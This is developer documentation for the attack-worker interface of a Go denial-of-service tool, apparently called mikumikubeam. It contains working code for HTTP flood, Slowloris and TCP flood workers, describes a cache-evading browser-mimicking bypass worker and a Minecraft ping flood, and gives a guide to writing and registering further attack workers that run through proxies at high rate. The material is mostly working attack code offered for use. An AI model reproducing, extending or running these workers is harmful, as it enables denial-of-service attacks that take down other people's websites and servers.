The AttackWorker interface defines the contract for implementing attack methods. Each attack type (HTTP flood, TCP flood, Slowloris, etc.) implements this interface to integrate with the engine.
Interface Definition
type AttackWorker interface {
// Fire sends a single payload for the given params using the provided proxy and user agent.
// It should return quickly and not block the caller; engine will dispatch concurrently.
// The log channel can be used to send individual attack logs.
Fire ( ctx context . Context , params AttackParams , proxy Proxy , userAgent string , logCh chan <- AttackStats ) error
}
Fire Method
Fire (
ctx context . Context ,
params AttackParams ,
proxy Proxy ,
userAgent string ,
logCh chan <- AttackStats ,
) error
Sends a single attack payload. Called concurrently by the engine for each packet.
Parameters
Return Value
Error if the attack failed. Current implementations return nil even on failure to avoid disrupting the attack flow.
Implementation Requirements
Performance Critical : Fire() is called at high frequency (potentially thousands of times per second). It must:
Return quickly (typically < 10ms)
Not block on I/O - use short timeouts
Handle errors gracefully without panicking
The engine dispatches Fire() calls in goroutines, so blocking briefly is acceptable. However, long-running operations should spawn their own goroutines (see Slowloris example).
Built-in Implementations
HTTP Flood Worker
Location : internal/attacks/http/flood.go
type floodWorker struct {}
func NewFloodWorker () * floodWorker { return & floodWorker {} }
Strategy :
Sends GET or POST requests with random payloads
Prefers POST for larger packet sizes (> 512 bytes)
Uses DialedHTTPClient() with proxy support
Discards response body to avoid blocking
Code Example :
func ( w * floodWorker ) Fire ( ctx context . Context , params core . AttackParams , p core . Proxy , ua string , logCh chan <- core . AttackStats ) error {
u := params . TargetNode . ToURL ()
target := u . String ()
client := netutil . DialedHTTPClient ( p , 5 * time . Second , 3 )
isGet := params . PacketSize <= 512 && rand . Intn ( 2 ) == 0
payload := randomString ( params . PacketSize )
var req * http . Request
var err error
if isGet {
req , err = http . NewRequestWithContext ( ctx , http . MethodGet , target + "/" + payload , nil )
} else {
req , err = http . NewRequestWithContext ( ctx , http . MethodPost , target , io . NopCloser ( bytes . NewBufferString ( payload )))
}
if err != nil {
return err
}
if ua != "" {
req . Header . Set ( "User-Agent" , ua )
}
resp , err := client . Do ( req )
if err == nil && resp != nil {
io . Copy ( io . Discard , resp . Body )
resp . Body . Close ()
core . SendAttackLogIfVerbose ( logCh , p , params . Target , params . Verbose )
}
return nil
}
HTTP Bypass Worker
Location : internal/attacks/http/bypass.go
type bypassWorker struct {}
func NewBypassWorker () * bypassWorker { return & bypassWorker {} }
Strategy :
Randomizes request paths and query parameters to evade caching
Sets realistic browser headers (Referer, Cookie, etc.)
Mimics resource requests (.js, .css, images)
Uses DialedMimicHTTPClient() with browser-like behavior
Key Features :
80% GET, 20% POST distribution
Random paths like abc123/xyz.js or random.css
Cache-busting query parameters
Realistic referers (same origin or popular sites)
HTTP Slowloris Worker
Location : internal/attacks/http/slowloris.go
type slowlorisWorker struct {}
func NewSlowlorisWorker () * slowlorisWorker { return & slowlorisWorker {} }
Strategy :
Opens raw TCP/TLS connection via SOCKS proxy
Sends HTTP headers slowly (one per PacketDelay)
Never completes the request to keep connection open
Periodically sends keep-alive headers
Code Pattern :
func ( w * slowlorisWorker ) Fire ( ctx context . Context , params core . AttackParams , p core . Proxy , ua string , logCh chan <- core . AttackStats ) error {
// ... establish connection ...
conn , err := netutil . DialedTCPClient ( ctx , scheme , host , portNum , pptr )
if err != nil {
return err
}
core . SendAttackLogIfVerbose ( logCh , p , params . Target , params . Verbose )
// Spawn goroutine to dribble headers slowly
go func ( c net . Conn ) {
defer c . Close ()
bw := bufio . NewWriter ( c )
fmt . Fprintf ( bw , "GET / HTTP/1.1 \r\n " )
// Send headers with delay
headers := [] string {
"Host: " + host ,
"User-Agent: " + pickUA ( ua ),
"Accept: */*" ,
"Connection: keep-alive" ,
}
for _ , h := range headers {
bw . WriteString ( h + " \r\n " )
bw . Flush ()
select {
case <- ctx . Done ():
return
case <- time . After ( params . PacketDelay ):
}
}
// Keep connection alive indefinitely
ticker := time . NewTicker ( params . PacketDelay )
defer ticker . Stop ()
for {
select {
case <- ctx . Done ():
return
case <- ticker . C :
bw . WriteString ( "X-a: b \r\n " )
bw . Flush ()
}
}
}( conn )
return nil
}
Slowloris returns immediately after spawning the goroutine. The connection lifecycle is managed by the spawned goroutine, which respects ctx.Done().
TCP Flood Worker
Location : internal/attacks/tcp/flood.go
type floodWorker struct {}
func NewFloodWorker () * floodWorker { return & floodWorker {} }
Strategy :
Opens raw TCP connection (via SOCKS proxy if available)
Sends random bytes (crypto/rand)
Sends multiple bursts (1-3) per fire
Uses 2-second write deadline
Code Example :
func ( w * floodWorker ) Fire ( ctx context . Context , params core . AttackParams , p core . Proxy , ua string , logCh chan <- core . AttackStats ) error {
tn := params . TargetNode
host := tn . Hostname ()
port := tn . PortNum ()
var pptr * core . Proxy
if p . Host != "" {
pptr = & p
}
conn , err := netutil . DialedTCPClient ( ctx , "tcp" , host , port , pptr )
if err != nil {
return nil
}
defer conn . Close ()
core . SendAttackLogIfVerbose ( logCh , p , params . Target , params . Verbose )
size := params . PacketSize
if size <= 0 {
size = 512
}
buf := make ([] byte , size )
rand . Read ( buf )
conn . SetWriteDeadline ( time . Now (). Add ( 2 * time . Second ))
conn . Write ( buf )
// Send multiple bursts
bursts := minInt ( 3 , 1 + randIntn ( 3 ))
for i := 0 ; i < bursts ; i ++ {
rand . Read ( buf )
conn . Write ( buf )
}
return nil
}
Minecraft Ping Worker
Location : internal/attacks/game/minecraft_ping.go
type mcPingWorker struct {}
func NewPingWorker () * mcPingWorker { return & mcPingWorker {} }
Strategy :
Sends Minecraft protocol handshake packet
Follows with status request (packet ID 0x00)
Reads partial response to prevent buffer buildup
Defaults to port 25565 if no port specified
Protocol Details :
// Handshake packet structure
Packet ID : 0x 00
Protocol Version : VarInt ( 754 for 1.16 + )
Server Address : String ( host )
Server Port : Unsigned Short ( big - endian )
Next State : VarInt ( 1 = status )
// Status request
Packet ID : 0x 00
Length : 1
Implementing a Custom Worker
Step 1: Define the Worker Type
package myattack
import (
" context "
core " github.com/sammwyy/mikumikubeam/internal/engine "
)
type customWorker struct {
// Optional: store configuration
}
func NewCustomWorker () * customWorker {
return & customWorker {}
}
Step 2: Implement the Fire Method
func ( w * customWorker ) Fire (
ctx context . Context ,
params core . AttackParams ,
proxy core . Proxy ,
userAgent string ,
logCh chan <- core . AttackStats ,
) error {
// 1. Extract target info
target := params . TargetNode
host := target . Hostname ()
port := target . PortNum ()
// 2. Establish connection (with proxy if available)
var pptr * core . Proxy
if proxy . Host != "" {
pptr = & proxy
}
conn , err := netutil . DialedTCPClient ( ctx , "tcp" , host , port , pptr )
if err != nil {
return nil // Don't disrupt attack flow
}
defer conn . Close ()
// 3. Send log if verbose
core . SendAttackLogIfVerbose ( logCh , proxy , params . Target , params . Verbose )
// 4. Send payload
payload := buildPayload ( params . PacketSize )
conn . SetWriteDeadline ( time . Now (). Add ( 3 * time . Second ))
conn . Write ( payload )
// 5. Optionally read response
buf := make ([] byte , 256 )
conn . Read ( buf )
return nil
}
Step 3: Register with Engine
const AttackCustom AttackKind = "custom_attack"
registry := engine . NewRegistry ()
registry . Register ( AttackCustom , myattack . NewCustomWorker ())
eng := engine . NewEngine ( * registry )
Best Practices
Return nil on most errors to avoid disrupting the attack flow
Only return errors for critical issues (e.g., invalid parameters)
Log errors to logCh if verbose mode is enabled
Always respect ctx.Done() in long-running operations
Pass ctx to all network calls (http.NewRequestWithContext, netutil.DialedTCPClient)
Use select statements when spawning goroutines:
select {
case <- ctx . Done ():
return
case <- time . After ( delay ):
// Continue
}
Check if proxy.Host is empty before using
Pass nil to netutil functions if no proxy:
var pptr * core . Proxy
if proxy . Host != "" {
pptr = & proxy
}
conn , err := netutil . DialedTCPClient ( ctx , "tcp" , host , port , pptr )
Always set reasonable timeouts on network operations
Typical values: 3-6 seconds for HTTP, 2-3 seconds for TCP
Use SetDeadline, SetReadDeadline, SetWriteDeadline for raw connections
Always defer Close() on connections
Discard HTTP response bodies to avoid memory leaks:
resp , err := client . Do ( req )
if err == nil && resp != nil {
io . Copy ( io . Discard , resp . Body )
resp . Body . Close ()
}
Use SendAttackLogIfVerbose() helper to respect verbose flag
Only send logs after successful operations
Use non-blocking sends (helper handles this automatically)
Testing Your Worker
func TestCustomWorker ( t * testing . T ) {
worker := NewCustomWorker ()
ctx := context . Background ()
params := core . AttackParams {
Target : "localhost:8080" ,
TargetNode : parseTarget ( "localhost:8080" ),
PacketSize : 1024 ,
Verbose : true ,
}
logCh := make ( chan core . AttackStats , 10 )
proxy := core . Proxy {} // No proxy
err := worker . Fire ( ctx , params , proxy , "Test-Agent" , logCh )
assert . NoError ( t , err )
// Check log was sent
select {
case stat := <- logCh :
assert . Contains ( t , stat . Log , "Miku miku beam" )
case <- time . After ( 1 * time . Second ):
t . Fatal ( "No log received" )
}
}
See Also